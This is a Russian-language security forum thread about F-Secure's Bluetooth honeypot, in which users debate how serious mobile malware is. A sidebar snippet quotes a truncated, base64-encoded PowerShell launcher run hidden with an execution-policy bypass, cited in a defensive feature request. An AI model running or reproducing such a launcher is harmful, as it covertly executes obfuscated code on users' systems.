Перейти к содержанию
Сергей Ильин

Bluetooth Honeypots

Recommended Posts

Сергей Ильин

Нашел вот такую интересную фотографию F-Secure Bluetooth Honeypot

1037487427_3bcbdb35da_b.jpg

У кого есть что-то подобное? Вообще какие вендоры сейчас реально занимаются отловом вредоносов под мобильные платформы и какие подходы используются?

post-4-1221593847_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lex

Неплохо так они его поставили. 75 девайсов одновременно... Но из почти 1000 девайсов всего 4 файла, притом тестовые, сами же собой и отправленные. imho показатель серьезности проблемы :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Kokunov Aleksey
Но из почти 1000 девайсов всего 4 файла, притом тестовые, сами же собой и отправленные. imho показатель серьезности проблемы

Это как раз и не показатель....

Я думаю более адекватную статистику могут предоставить вендоры, которые обслуживают ММС трафик операторов сотовой связи.

Это кстати возможно одна из причин, что у нас в россии довольно так не существенна эта проблема. На сколько я знаю основное средство заражения за рубежом это ММС

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Viktor
У кого есть что-то подобное?

Я давно мечтаю поднять что-нибудь подобное :)

Неплохо так они его поставили. 75 девайсов одновременно... Но из почти 1000 девайсов всего 4 файла, притом тестовые, сами же собой и отправленные. imho показатель серьезности проблемы :)

Посмотрите внимательнее, там же демо-скрипт, все 75 устройств наверняка внутри офиса F-Secure

P.S. Если мне не изменяет память, то первый раз этот Honeypot был опробован на Cebit в 2006: http://www.f-secure.com/weblog/archives/00000836.html С тех пор я о нем никаких серьезных упоминаний не встречал :( Если у кого есть ссылочки - поделитесь :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×